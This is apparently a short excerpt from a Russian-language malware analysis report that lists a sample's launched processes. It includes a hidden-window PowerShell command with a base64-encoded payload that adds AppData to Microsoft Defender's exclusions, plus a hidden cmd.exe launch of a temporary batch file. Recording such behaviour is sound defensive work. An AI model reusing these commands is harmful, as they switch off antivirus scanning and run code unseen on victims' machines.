Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h -enc cwB0AGEAcgB0ACAAUABvAHcAZQByAHMAaABlAGwAbAAgAC0AQQAgACcAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACcAIAAtAFY...
- %TEMP%\e510.tmp\e511.tmp\e512.bat
- %TEMP%\e510.tmp\e511.tmp\e512.bat
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\E510.tmp\E511.tmp\E512.bat <Полный путь к файлу>" (со скрытым окном)